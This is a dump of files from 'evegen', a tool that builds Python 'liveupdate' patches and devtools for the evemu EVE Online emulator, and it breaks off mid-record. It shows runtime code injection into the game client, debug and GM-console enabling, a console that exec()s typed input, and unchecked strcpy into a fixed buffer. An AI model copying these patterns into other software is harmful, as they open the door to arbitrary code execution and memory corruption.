std::vector<std::string> decos;\n\n for (uint32_t i = 0; i < lines.size(); i++) {\n std::string line = lines[i];\n if (line.size() > 1) {\n if (line[0] == '#' &&\n line[1] == '@') {\n decos.push_back(std::string(&line.c_str()[1]));\n }\n }\n }\n\n if (decos.size() < 2) {\n printf(\" ERROR | Patches must contain at least two comment decos\\n\");\n return NULL;\n }\n\n bool liveupdate_ok = false;\n bool patchinfo_ok = false;\n\n for (uint32_t i = 0; i < decos.size(); i++) {\n std::string deco = decos[i];\n\n stb_c_lexer_init(&lex, deco.c_str(), deco.c_str() + deco.size(),\n (char *)malloc(0x10000), 0x10000);\n stb_c_lexer_get_token(&lex);\n\n if (lex.token != '@') {\n printf(\" ERROR | Expected '@' but got something else\\n\");\n return NULL;\n }\n\n stb_c_lexer_get_token(&lex);\n\n if (lex.token != CLEX_id) {\n printf(\" ERROR | Unexpected token\\n\");\n return NULL;\n }\n\n if 
(strcmp(lex.string, \"liveupdate\") == 0) {\n if (liveupdate_ok) {\n printf(\" WARN | Two liveupdate decos in %s\\n\", p->name);\n } else {\n liveupdate_ok = ParseLiveupdate(&lex, p);\n }\n } else if (strcmp(lex.string, \"patchinfo\") == 0) {\n if (patchinfo_ok) {\n printf(\" WARN | Two patchinfo decos in %s\\n\", p->name);\n } else {\n patchinfo_ok = ParseInfo(&lex, p);\n }\n } else {\n printf(\" ERROR | Unknown deco type '%s'\\n\", lex.string);\n }\n }\n\n if (liveupdate_ok == false ||\n patchinfo_ok == false) {\n printf(\" ERROR | Didn't get a valid liveupdate or patchinfo deco\\n\");\n printf(\" liveupdate:%d patchinfo:%d\\n\", liveupdate_ok, patchinfo_ok);\n return NULL;\n }\n\n\n return p;\n}\n\n// PreProceessPatch does the bytecode compilation for the given patch\nbool PreProcessPatch(Patch *p) {\n PyErr_Clear();\n PyObject *code = PyImport_AddModule(\"__main__\");\n int ret = PyRun_SimpleString(p->data);\n if (ret != 0) {\n printf(\" ERROR | Some kind of error while parsing the patch\\n\");\n return false;\n }\n if (code == NULL) {\n PyObject *type, *value, *traceback;\n PyErr_Fetch(&type, &value, &traceback);\n printf(\" ERROR | Failed to compile patch\\n\");\n printf(\" | %s\\n\", PyString_AsString(value));\n return false;\n }\n\n PyObject *func = PyObject_GetAttrString(code, p->func_name);\n if (func == NULL) {\n PyObject *type, *value, *traceback;\n PyErr_Fetch(&type, &value, &traceback);\n printf(\" ERROR | Unable to get function object from compiled code\\n\");\n printf(\" | %s\\n\", PyString_AsString(value));\n return false;\n }\n PyObject *bytecode = PyObject_GetAttrString(func, \"func_code\");\n if (bytecode == NULL) {\n PyObject *type, *value, *traceback;\n PyErr_Fetch(&type, &value, &traceback);\n printf(\" ERROR | Object didn't return an object with func_code\\n\");\n printf(\" | %s\\n\", PyString_AsString(value));\n return false;\n }\n\n PyObject *bytecode_str = PyMarshal_WriteObjectToString(bytecode,\n Py_MARSHAL_VERSION);\n\n PyString_AsStringAndSize(bytecode_str, &p->bytecode, (Py_ssize_t *)&p->bytecode_size);\n\n return true;\n}\n\n// LoadPatches returns a list of valid patches given a directory\nstd::vector<Patch *> LoadPatches(const char *patch_dir) {\n DIR *dir = opendir(patch_dir);\n dirent *pent = NULL;\n std::vector<Patch *> patches;\n\n while ((pent = readdir(dir))) {\n if (pent->d_name[0] == '.') {\n continue;\n }\n\n char *filename = (char *)calloc(256, 1);\n strcpy(filename, patch_dir);\n strcat(filename, \"/\");\n strcat(filename, pent->d_name);\n\n if (pent->d_type == DT_REG) {\n Patch *p = CreatePatch(filename);\n if (p != NULL) {\n if (PreProcessPatch(p)) {\n patches.push_back(p);\n }\n }\n }\n }\n return patches;\n}\n\n#pragma GCC diagnostic push\n#pragma GCC diagnostic ignored \"-Wunused-result\"\n\nconst char *PatchErrorString(PatchError pe) {\n PatchError_ p = pe.err;\n switch (p) {\n case patch_ok: {\n return \"OK\";\n } break;\n case patch_invalid_magic: {\n return \"Invalid magic in raw liveupdate file\";\n } break;\n case patch_file_too_small: {\n return \"Patch file too small. 
We wanted to read more than existed\";\n } break;\n case patch_file_error: {\n return \"Generic file error while writing\";\n } break;\n case __patch_null: {\n } // fallthrough\n default: {\n return \"<PROGRAMMER ERROR>\";\n }\n }\n return NULL;\n}\n\n#define strlen_write_size(dest) { \\\n dest ## _size = strlen(dest); \\\n }\n\n#define fwrite_string_check(dest) { \\\n if(fwrite(dest, sizeof(char), dest ## _size, f) \\\n < dest ## _size) { \\\n MAKE_PATCH_ERROR(patch_file_error); \\\n } \\\n }\n\n\n#define fread_string_check(dest) { \\\n uint32_t s = fread(dest, sizeof(char), dest ## _size, f); \\\n if (s < dest ## _size) { \\\n printf(\"%u < %u\\n\", s, dest ## _size); \\\n MAKE_PATCH_ERROR(patch_file_too_small); \\\n } \\\n } \\\n\nPatchError LoadRawPatchFile(PatchFile *pf, const char *filename) {\n FILE *f = fopen(filename, \"rb\");\n if (fread(pf->magic, sizeof(char), 4, f) < 4) {\n MAKE_PATCH_ERROR(patch_file_too_small);\n }\n\n if (strncmp(pf->magic, LIVEUPDATEMAGIC, 4) != 0) {\n MAKE_PATCH_ERROR(patch_invalid_magic);\n }\n \n size_t count_read = fread(&pf->patch_count, 1, sizeof(uint32_t), f);\n if (count_read < sizeof(uint32_t)) {\n MAKE_PATCH_ERROR(patch_file_too_small);\n }\n\n pf->patches = (Patch *)calloc(sizeof(Patch), pf->patch_count);\n\n for (uint32_t i = 0; i < pf->patch_count; i++) {\n Patch *p = &pf->patches[i];\n if (fread(p, sizeof(uint32_t), 7, f) < 7) {\n MAKE_PATCH_ERROR(patch_file_too_small);\n }\n\n p->class_name = (char *)calloc(1, p->class_name_size + 1);\n p->func_name = (char *)calloc(1, p->func_name_size + 1);\n p->method_name = (char *)calloc(1, p->method_name_size + 1);\n p->type = (char *)calloc(1, p->type_size + 1);\n p->name = (char *)calloc(1, p->name_size + 1);\n p->desc = (char *)calloc(1, p->desc_size + 1);\n p->bytecode = (char *)calloc(1, p->bytecode_size + 1);\n\n fread_string_check(p->class_name);\n fread_string_check(p->method_name);\n fread_string_check(p->func_name);\n fread_string_check(p->type);\n fread_string_check(p->name);\n fread_string_check(p->desc);\n fread_string_check(p->bytecode);\n }\n fclose(f);\n\n MAKE_PATCH_ERROR(patch_ok);\n}\n\nPatchError DumpRawPatchFile(std::vector<Patch *> patches, const char *filename) {\n FILE *f = fopen(filename, \"wb\");\n if (f == NULL) {\n MAKE_PATCH_ERROR(patch_file_error);\n }\n\n uint32_t c = patches.size();\n\n if (fwrite(LIVEUPDATEMAGIC, 1, strlen(LIVEUPDATEMAGIC), f) < strlen(LIVEUPDATEMAGIC)) {\n MAKE_PATCH_ERROR(patch_file_error);\n }\n\n if (fwrite(&c, 1, sizeof(uint32_t), f) < sizeof(uint32_t)) {\n MAKE_PATCH_ERROR(patch_file_error);\n }\n\n for (uint32_t i = 0; i < c; i++) {\n Patch *p = patches[i];\n\n strlen_write_size(p->class_name);\n strlen_write_size(p->method_name);\n strlen_write_size(p->func_name);\n strlen_write_size(p->type);\n strlen_write_size(p->name);\n strlen_write_size(p->desc);\n\n // Write the first 7 entries containing the sizes of all of the strings\n if (fwrite(p, sizeof(uint32_t), 7, f) < 7) {\n MAKE_PATCH_ERROR(patch_file_error);\n }\n fwrite_string_check(p->class_name);\n fwrite_string_check(p->method_name);\n fwrite_string_check(p->func_name);\n fwrite_string_check(p->type);\n fwrite_string_check(p->name);\n fwrite_string_check(p->desc);\n fwrite_string_check(p->bytecode);\n }\n\n MAKE_PATCH_ERROR(patch_ok);\n}\n#pragma GCC diagnostic pop\n"
},
{
"alpha_fraction": 0.704023003578186,
"alphanum_fraction": 0.704023003578186,
"avg_line_length": 62.272727966308594,
"blob_id": "de8ed418640fb506b8fd1ad071fee40f86ae4314",
"content_id": "2b4d9b035239cb5e5060d2bcade72c6e4fd86d98",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 696,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 11,
"path": "/patches/disabled/EnableDebugSvc.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "# WindowMgr.GetWindowColors seemed like a good entry point?\n#@liveupdate(\"globalClassMethod\", \"svc.window::WindowMgr\", \"GetWindowColors\")\ndef GetWindowColors(self):\n if getattr(self, \"__debugPatched__\", None) == None:\n sm.StartService(\"debug\") # maybe something can be hacked together with sm.GetService(\"debugSvc\")._ExecConsole()\n setattr(self, \"__debugPatched__\", True)\n return (settings.user.windows.Get(\"wndColor\", eve.themeColor),\n settings.user.windows.Get(\"wndBackgroundcolor\", eve.themeBgColor),\n settings.user.windows.Get(\"wndComponent\", eve.themeCompColor),\n settings.user.windows.Get(\"wndComponentsub\", eve.themeCompSubColor)\n )\n"
},
{
"alpha_fraction": 0.6051517128944397,
"alphanum_fraction": 0.6087006330490112,
"avg_line_length": 58.828765869140625,
"blob_id": "5cd5c318b9c171e08af397f5b9a3103d3d89d172",
"content_id": "7b246ccaaf8163a090f53ed8dc4de79ed1c199d5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8735,
"license_type": "permissive",
"max_line_length": 176,
"num_lines": 146,
"path": "/patches/FixGMMenu.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#@liveupdate(\"globalClassMethod\", \"svc.menu::MenuSvc\", \"GetGMMenu\")\n#@patchinfo(\"GetGMMenu\", \"Various fixes to the right click GM menu\")\ndef GetGMMenu(self, itemID = None, slimItem = None, charID = None, invItem = None, mapItem = None):\n\n def startConsole():\n import form\n import triui\n import code\n import uthread\n m = form.MessageBox.Open()\n m.Execute(\"a\", \"Notice\", triui.OK, triui.INFO, \"don't look at me\")\n m.SetText(\"You must start exefile.exe with /console for this to do anything\")\n uthread.new(code.interact, ())\n\n if not session.role & (service.ROLE_GML | service.ROLE_WORLDMOD):\n if charID and session.role & service.ROLE_LEGIONEER:\n return [('Gag ISK Spammer', self.GagIskSpammer, (charID,))]\n return []\n gm = [(str(itemID or charID), blue.pyos.SetClipboardData, (str(itemID or charID),))]\n gm.append((\"Open Dev Window\", form.DevWindow.Open, ()))\n gm.append((\"Open Console (don't do it)\", startConsole, ()))\n if mapItem and not slimItem:\n gm.append(('TR me here!', sm.RemoteSvc('slash').SlashCmd, ('/tr me ' + str(mapItem.itemID),)))\n #eve.Message(\"CustomNotify\", {\"notify\": \"Teleporting to: \" + str(mapItem.itemID)})\n gm.append(None)\n elif charID:\n gm.append(('TR me to %s' % cfg.eveowners.Get(charID).name, sm.RemoteSvc('slash').SlashCmd, ('/tr me ' + str(charID),)))\n gm.append(None)\n elif slimItem:\n gm.append(('TR me here!', sm.RemoteSvc('slash').SlashCmd, ('/tr me ' + str(itemID),)))\n gm.append(None)\n if invItem:\n typeID = invItem.typeID\n gm += [('Copy ID/Qty', self.CopyItemIDAndMaybeQuantityToClipboard, (invItem,))]\n typeText = 'copy typeID (%s)' % invItem.typeID\n gm += [(typeText, blue.pyos.SetClipboardData, (str(invItem.typeID),))]\n if invItem.flagID == const.flagHangar and invItem.locationID == session.stationid and invItem.itemID not in (session.shipid, session.charid):\n gm.append(('Take out trash', self.TakeOutTrash, [[invItem]]))\n #gm.append(('Edit', self.GetAdamEditType, [invItem.typeID]))\n #gm.append(None)\n if typeID < 140000000:\n typeID = invItem.typeID\n gm.append(('typeID: ' + str(typeID) + ' (%s)' % cfg.invtypes.Get(typeID).name, blue.pyos.SetClipboardData, (str(typeID),)))\n invType = cfg.invtypes.Get(typeID)\n group = invType.groupID\n gm.append(('groupID: ' + str(group) + ' (%s)' % invType.Group().name, blue.pyos.SetClipboardData, (str(group),)))\n category = invType.categoryID\n categoryName = cfg.invcategories.Get(category).name\n gm.append(('categID: ' + str(category) + ' (%s)' % categoryName, blue.pyos.SetClipboardData, (str(category),)))\n graphic = invType.Graphic()\n if graphic:\n gm.append(('graphicID: ' + str(graphic.id), blue.pyos.SetClipboardData, (str(graphic.id),)))\n gm.append(('graphicFile: ' + str(graphic.graphicFile), blue.pyos.SetClipboardData, (str(graphic.graphicFile),)))\n if charID and not util.IsNPC(charID):\n action = 'gm/character.py?action=Character&characterID=' + str(charID)\n #gm.append(('Show in ESP', self.GetFromESP, (action,)))\n gm.append(None)\n gm.append(('Gag ISK Spammer', self.GagIskSpammer, (charID,)))\n gm.append(('Ban ISK Spammer', self.BanIskSpammer, (charID,)))\n #action = 'gm/users.py?action=BanUserByCharacterID&characterID=' + str(charID)\n #gm.append(('Ban User (ESP)', self.GetFromESP, (action,)))\n gm += [('Gag User', [('30 minutes', self.GagPopup, (charID, 30)),\n ('1 hour', self.GagPopup, (charID, 60)),\n ('6 hours', self.GagPopup, (charID, 360)),\n ('24 hours', self.GagPopup, (charID, 1440)),\n None,\n ('Ungag', lambda *x: self.SlashCmd('/ungag %s' % 
charID))])]\n gm.append(None)\n item = slimItem or invItem\n if item:\n if item.categoryID == const.categoryShip and (item.singleton or not session.stationid):\n #import dna\n #if item.ownerID in [session.corpid, session.charid] or session.role & service.ROLE_WORLDMOD:\n # try:\n # menu = dna.Ship().ImportFromShip(shipID=item.itemID, ownerID=item.ownerID, deferred=True).GetMenuInline(spiffy=False, fit=item.itemID != session.shipid)\n # gm.append(('Copycat', menu))\n # except RuntimeError:\n # pass\n gm += [('/Online modules', lambda shipID = item.itemID: self.SlashCmd('/online %d' % shipID))]\n gm += self.GetGMTypeMenu(item.typeID, itemID=item.itemID)\n if getattr(slimItem, 'categoryID', None) == const.categoryEntity or getattr(slimItem, 'groupID', None) == const.groupWreck:\n gm.append(('NPC Info', ('isDynamic', self.NPCInfoMenu, (item,))))\n gm.append(None)\n if session.role & service.ROLE_CONTENT:\n if slimItem:\n if getattr(slimItem, 'dunObjectID', None) != None:\n if not sm.StartService('scenario').IsSelected(itemID):\n gm.append(('Add to Selection', sm.StartService('scenario').AddSelected, (itemID,)))\n else:\n gm.append(('Remove from Selection', sm.StartService('scenario').RemoveSelected, (itemID,)))\n if slimItem:\n itemID = slimItem.itemID\n graphicID = cfg.invtypes.Get(slimItem.typeID).graphicID\n graphicFile = util.GraphicFile(graphicID)\n if graphicFile is '':\n graphicFile = None\n subMenu = self.GetGMStructureStateMenu(itemID, slimItem, charID, invItem, mapItem)\n if len(subMenu) > 0:\n gm += [('Change State', subMenu)]\n gm += self.GetGMBallsAndBoxesMenu(itemID, slimItem, charID, invItem, mapItem)\n gm.append(None)\n gm.append(('charID: ' + self.GetOwnerLabel(slimItem.charID), blue.pyos.SetClipboardData, (str(slimItem.charID),)))\n gm.append(('ownerID: ' + self.GetOwnerLabel(slimItem.ownerID), blue.pyos.SetClipboardData, (str(slimItem.ownerID),)))\n gm.append(('corpID: ' + self.GetOwnerLabel(slimItem.corpID), blue.pyos.SetClipboardData, (str(slimItem.corpID),)))\n gm.append(('allianceID: ' + self.GetOwnerLabel(slimItem.allianceID), blue.pyos.SetClipboardData, (str(slimItem.allianceID),)))\n gm.append(None)\n gm.append(('typeID: ' + str(slimItem.typeID) + ' (%s)' % cfg.invtypes.Get(slimItem.typeID).name, blue.pyos.SetClipboardData, (str(slimItem.typeID),)))\n gm.append(('groupID: ' + str(slimItem.groupID) + ' (%s)' % cfg.invgroups.Get(slimItem.groupID).name, blue.pyos.SetClipboardData, (str(slimItem.groupID),)))\n gm.append(('categID: ' + str(slimItem.categoryID) + ' (%s)' % cfg.invcategories.Get(slimItem.categoryID).name, blue.pyos.SetClipboardData, (str(slimItem.categoryID),)))\n gm.append(('graphicID: ' + str(graphicID), blue.pyos.SetClipboardData, (str(graphicID),)))\n gm.append(('graphicFile: ' + str(graphicFile), blue.pyos.SetClipboardData, (str(graphicFile),)))\n gm.append(None)\n gm.append(('Copy Coordinates', self.CopyCoordinates, (itemID,)))\n gm.append(None)\n try:\n state = slimItem.orbitalState\n if state in (entities.STATE_UNANCHORING,\n entities.STATE_ONLINING,\n entities.STATE_ANCHORING,\n entities.STATE_OPERATING,\n entities.STATE_OFFLINING,\n entities.STATE_SHIELD_REINFORCE):\n stateText = pos.DISPLAY_NAMES[pos.Entity2DB(state)]\n gm.append(('End orbital state change (%s)' % stateText, self.CompleteOrbitalStateChange, (itemID,)))\n elif state == entities.STATE_ANCHORED:\n upgradeType = sm.GetService('godma').GetTypeAttribute2(slimItem.typeID, const.attributeConstructionType)\n if upgradeType is not None:\n gm.append(('Upgrade to %s' % 
cfg.invtypes.Get(upgradeType).typeName, self.GMUpgradeOrbital, (itemID,)))\n gm.append(('GM: Take Control', self.TakeOrbitalOwnership, (itemID, slimItem.planetID)))\n except ValueError:\n pass\n gm.append(None)\n dict = {'CHARID': charID,\n 'ITEMID': itemID,\n 'ID': charID or itemID}\n for i in range(20):\n item = prefs.GetValue('gmmenuslash%d' % i, None)\n if item:\n for (k, v,) in dict.iteritems():\n if ' %s ' % k in item and v:\n item = item.replace(k, str(v))\n break\n else:\n continue\n gm.append((item, sm.RemoteSvc('slash').SlashCmd, (item,)))\n return gm\n"
},
{
"alpha_fraction": 0.6724137663841248,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 47.33333206176758,
"blob_id": "021c800a4fad8e50cfa620c00298521f31202425",
"content_id": "166c902ddeec977b26abc4e3b817f3345610bda9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 290,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 6,
"path": "/patches/news.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#@liveupdate(\"globalClassMethod\", \"form.CharSelection::CharSelection\", \"OpenNews\")\n#@patchinfo(\"OpenNews\", \"Changes the news url\")\ndef OpenNews(self, browser, *args):\n import uicls\n uicls.Fill(parent=browser, color=(0.2, 0.2, 0.2, 0.4))\n browser.GoTo(\"http://evenews.alasiya.net\")\n"
},
{
"alpha_fraction": 0.7442434430122375,
"alphanum_fraction": 0.7458881735801697,
"avg_line_length": 29.915254592895508,
"blob_id": "c17640fc771c73766e72d2c75b99c8eaab6ea839",
"content_id": "9369172a69b0bb9ab8e5f84bb5438fb126f11ecf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3648,
"license_type": "permissive",
"max_line_length": 181,
"num_lines": 118,
"path": "/README.md",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "# evegen\n\nUtility to generate liveupdates and devtools.raw for evemu.\n\n## Getting it\n\nCheck the [releases](https://github.com/THUNDERGROOVE/evegen/releases/)\n\n```\n./configure\n\nmake\n```\n\nI wouldn't recommend `make install` without a prefix.\n\n## argument info\n\nGenerate a devtools.raw file\n`./evegen -dev <devtools file>`\nThe argument is optional\n\nApply patches to the database\n`./evegen -patch <username> <password> <db>`\nAll arguments required\n\nDo a test run of the patches without writing to the database\n`./evegen -test` \n\n## patch files\n\nPatch files essentially overwrite specific functions in the EVE client.\n\nThe simplest example is the patch for disable the tutorials.\n\n```\n#@liveupdate(\"globalClassMethod\", svc.tutorial::TutorialSvc\", \"GetTutorials\")\n#@patchinfo(\"GetTutorials\", Disable tutorials whenever accessed. They cause issues\")\n\ndef GetTutorials(self):\n import __builtin__\n eve.Message(\"CustomNotify\", {\"notify\": \"Disabling tutorials\"})\n __builtin__.settings.Get(\"Char\").Set(\"ui\", \"showTutorials\", 0)\n eve.Message(\"CustomNotify\", {\"notify\": \"Tutorials disabled!\"})\n return {}\n```\n\nYou can see the decorator like annotations at the beginging of the file. They can exist anywhere in the file but it's good practice to leave them in the begining.\n\nThe first one is `liveupdate` it always has three arguments.\n\nThis portion is limited as it's been awhile since I've worked with patches.\n\n1. patch type.\n2. Where clause. \n3. Identifier of what you're patching\n\nGenerally, you can do anything with `globalClassMethod` patch type.\nThe where clause for that is going to be \n`<destination package>.<class name>::<instance name>`\n\nThe second annotation is `patchinfo`\n\nIt requires two arguments as follows\n\n1. Name of the function in the patch file you're using to patch the original\n2. Description\n\nThe description is only in the DB, and afaik isn't even sent to the client.\n\n## Devtools\n\nUnlike patches, devtools adds new code to the client. In some spots in the client, it expects certain code to exist in the client which normally doesn't if you have specific roles.\n\nThis can break various things if you're missing said code.\n\nA main devtools files expects a `Bootstrap` function that accepts two arguments.\n\n```\ndef Bootstrap(a, b):\n ...\n```\n\nInside, you can do pretty much anything you want. Any code in the Bootstrap function will run.\n\nThe only main requirement is that you set the `a.Loader` to a compiled function like so\n\n```\nscript = \"def hello():\\n\\tprint('Hello World')\"\ncode = compile(script, '<script>', 'exec')\ndata = marshal.dumps(code)\nexec marshal.loads(data) in None, None\na.Loader = hello\n```\n\nIf you don't do it this way, things get pretty fucky.\n\nAnything used in the Bootstrap function *MUST* be imported in the functions scope.\n\nAny instance of `'hexex::filename.py'` will replace the string with a hex encoded representation of the bytecode.\n\nYou can then create a new module with `imp` and dump the code straight into the modules `.__dict__` attribute.\n\nAfter that is done, you will want to add it to nasty's named object table so it will take into effect globally. 
This whole process looks something like this.\n\n```\nnewclass = \"hexex::newclass.py\"\ncode = marshal.loads(newclass.decode(\"hex\"))\nNewModule = imp.new_module(\"NewModule\")\nexec code in NewModule.__dict, None\nnast.nast.RegisterNamedObject(NewModule.NewClass, \"form\", \"NewClass\", \"devtools.py\", globals())\n```\n\n## Notes\n\nSometimes, due to the way scoping turns out, you can't use any imports already imported into the file or sometimes even builtins added by the client.\n\nGenerally, just import anything you need in your function.\n"
},
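The README above describes the 'hexex::filename.py' substitution without showing it. Here is a sketch of what that substitution has to produce, under CPython 2.7 (matching the client code in this repo); the helper name is made up:

```
# Sketch only, CPython 2.7: compile a source file and hex-encode its
# marshaled code object, as the 'hexex::...' placeholder expects.
import marshal

def hexex(path):
    with open(path) as f:
        code = compile(f.read(), path, 'exec')
    return marshal.dumps(code).encode('hex')  # Python 2 str-to-hex codec

# Loading mirrors the Bootstrap example above:
#   code = marshal.loads(blob.decode('hex'))
#   mod = imp.new_module('NewModule')
#   exec code in mod.__dict__
```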
{
"alpha_fraction": 0.6181640625,
"alphanum_fraction": 0.638671875,
"avg_line_length": 30.96875,
"blob_id": "f016c2fbf988e3e5b640b9fd19ba1084c6f77055",
"content_id": "03f110c531386254ea0ebbd25bb5dfa6441a14a9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1024,
"license_type": "permissive",
"max_line_length": 159,
"num_lines": 32,
"path": "/devToolsConsole.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "import uicls\nimport uiconst\n\nclass ConsoleWindow(uicls.Window):\n __guid__ = \"form.Console\"\n default_windowID = \"Console\"\n default_width = 450\n default_height = 300\n default_topParentHeight = 0\n default_minSize = (default_width, default_height)\n\n\n\n def write(self, txt):\n import listentry\n self.sr.scroll.AddNode(-1, listentry.Get(\"Text\", {\"text\": txt, \"line\": 1}))\n\n def ApplyAttributes(self, attributes):\n import uicls\n import uiutil\n import uiconst\n import sys\n sys.stdout = self\n uicls.Window.ApplyAttributes(self, attributes)\n scroll = uicls.Scroll(parent=uiutil.GetChild(self, 'main'), padding=2)\n self.sr.scroll = scroll\n self.edit = uicls.SinglelineEdit(name=\"\", readonly=False, parent=self.sr.maincontainer, align=uiconst.RELATIVE, pos=(2, 2, 150, 25), padding=(0,0,0,0))\n self.edit.OnReturn = self.EnterPressed\n\n def EnterPressed(self, *args):\n val = self.edit.GetValue() \n exec(val + \"\\n\")\n\n"
},
{
"alpha_fraction": 0.5763729214668274,
"alphanum_fraction": 0.5873212218284607,
"avg_line_length": 35.584415435791016,
"blob_id": "d51bf386e71c87c13fa3bfb7ea3583a8f0ba8c92",
"content_id": "2a56c207ad9e0e779f2e11fc25718a0567c6e184",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5663,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 154,
"path": "/devToolsWindow.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "import uicls\nimport uiconst\n\n# sm.GetService(\"cmd\").commandMap.AddCommand(util.CommandMap(form.DevWindow.Show, (uiconst.VK_CONTROL, uiconst.VK_D)))\nclass DevWindow(uicls.Window):\n __guid__ = \"form.DevWindow\"\n default_windowID = \"DevWindow\"\n default_width = 450\n default_height = 300\n default_topParentHeight = 0\n default_minSize = (default_width, default_height)\n console_state = 0\n\n def ApplyAttributes(self, attributes):\n import uicls\n import uiconst\n uicls.Window.ApplyAttributes(self, attributes)\n uicls.Button(parent=self.sr.maincontainer, align=uiconst.TOLEFT, label=\"UIDebugger\", func=self.OpenUIDebugger)\n uicls.Button(parent=self.sr.maincontainer, align=uiconst.TOLEFT, label=\"Dungeon Editor\", func=self.OpenDungeonEditor)\n uicls.Button(parent=self.sr.maincontainer, align=uiconst.TOLEFT, label=\"Paint Direction Vectors\", func=self.StartPaintingDirectionVectors)\n\n #uicls.Button(self.sr.maincontainer, align=uiconst.TOLEFT, label=\"Camera Settings\", func=self.OpenCameraSettings)\n uicls.Button(parent=self.sr.maincontainer, align=uiconst.TOLEFT, label=\"Start RC\", func=self.ToggleRemoteConsole)\n\n def OpenUIDebugger(self, a):\n import form\n form.UIDebugger.Open()\n\n def OpenDungeonEditor(self, a):\n import form\n form.DungeonEditor.Open()\n\n def OpenCameraSettings(self, a):\n import cameras\n cameras.DebugChangeCameraSettingsWindow.Open()\n def StartPaintingDirectionVectors(self, a):\n from log import LogError\n import uix\n\timport uiutil\n\timport mathUtil\n\timport xtriui\n\timport uthread\n\timport form\n\timport blue\n\timport util\n\timport spaceObject\n\timport trinity\n\timport service\n\timport destiny\n\timport listentry\n\timport base\n\timport math\n\timport sys\n\timport geo2\n\timport maputils\n\timport copy\n\tfrom math import pi, cos, sin, sqrt, floor\n\tfrom foo import Vector3\n\tfrom mapcommon import SYSTEMMAP_SCALE\n\tfrom traceback import format_exception\n\timport functools\n\timport uiconst\n\timport uicls\n\timport listentry\n\timport state\n\timport localization\n\timport localizationUtil\n\t\n\tdef safetycheck(func):\n def wrapper(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except:\n try:\n print \"exception in \" + func.__name__\n (exc, e, tb,) = sys.exc_info()\n result2 = (''.join(format_exception(exc, e, tb)) + '\\n').replace('\\n', '<br>')\n #sm.GetService('gameui').MessageBox(result2, \"ProbeHelper Exception\")\n sm.GetService('FxSequencer').LogError(result2)\n except:\n print \"exception in safetycheck\"\n return wrapper\n\n\t@safetycheck\n\tdef WarpToStuff(ItemID):\n sm.services[\"michelle\"].GetRemotePark().CmdWarpToStuff(\"item\", ItemID, 50000)\t\n\t\t\n\t@safetycheck\n\tdef GetBallPark():\n bp = sm.GetService('michelle').GetBallpark()\n while(not bp):\n blue.pyos.synchro.Sleep(5000)\n bp = sm.GetService('michelle').GetBallpark()\n return bp\t\n\n\t@safetycheck\n\tdef LogMessage(Message_Text):\n\t\tsm.GetService('gameui').Say(Message_Text)\n\t\n\t@safetycheck\n\tdef ShowAllPaths():\n bp = GetBallPark()\n myball = bp.GetBall(eve.session.shipid)\t\n if not myball:\n LogMessage(\"ball doesnt exist\")\n return\n if bp:\n balls = copy.copy(bp.balls)\n LogMessage(\"Copied Ballpark\")\n else:\n LogMessage(\"Invalid Ballpark\")\n \n \n tacticalSvc = sm.GetService(\"tactical\")\n tacticalSvc.circles.ClearLines()\n color = (0.25,0.25,0.25,1)\n \n i = 0\n for qq in range(500):\n blue.pyos.synchro.Sleep(500)\n tacticalSvc.circles.ClearLines()\n for ballid in balls.iterkeys():\n ball = bp.GetBall(ballid)\n 
slimItem = bp.GetInvItem(ballid) \n if (ball.maxVelocity != 0):\n currentDirection = ball.GetQuaternionAt(blue.os.GetTime())\n d = trinity.TriVector(0,0,1)\n d.TransformQuaternion(currentDirection)\n #LogMessage(str(d.x) + \" \" + str(d.y) + \" \" + str(d.z))\n d.x = d.x*10000\n d.y = d.y*10000\n d.z = d.z*10000\n LogMessage(str(d.x) + \" \" + str(d.y) + \" \" + str(d.z))\n RelPosBallX = (ball.x-myball.x)\n RelPosBallY = (ball.y-myball.y)\n RelPosBallZ = (ball.z-myball.z)\n\t\t\t\t\t\n tacticalSvc.circles.AddLine((RelPosBallX,RelPosBallY,RelPosBallZ),color,(RelPosBallX+d.x,RelPosBallY+d.y,RelPosBallZ+d.z),color)\n tacticalSvc.circles.SubmitChanges()\n\t\ti=i+1\n try:\n uthread.new(ShowAllPaths)\n\texcept:\n\t\tLogMessage(\"error\")\n\n def ToggleRemoteConsole(self, a):\n import uicls\n import uiconst\n\n self.sr.maincontainer.children.remove(self.sr.maincontainer.children[9]) # TODO: Nick: Fix this hardcoded garbage if possible\n if self.console_state == 0:\n uicls.Button(parent=self.sr.maincontainer, align=uiconst.TOLEFT, label=\"RC Running..\", func=self.ToggleRemoteConsole)\n self.console_state = 1\n sm.GetService(\"insider\").start_remote_console()\n \n \n\n\n\n"
},
{
"alpha_fraction": 0.7228195667266846,
"alphanum_fraction": 0.7228195667266846,
"avg_line_length": 54.79999923706055,
"blob_id": "83e3a1c39310ee30dbab3a2f2bdd86c402802496",
"content_id": "bfad396f80aa2cbcb035a75d34b6e4689520e19a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 837,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 15,
"path": "/patches/EVEMuPhotoUpload.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
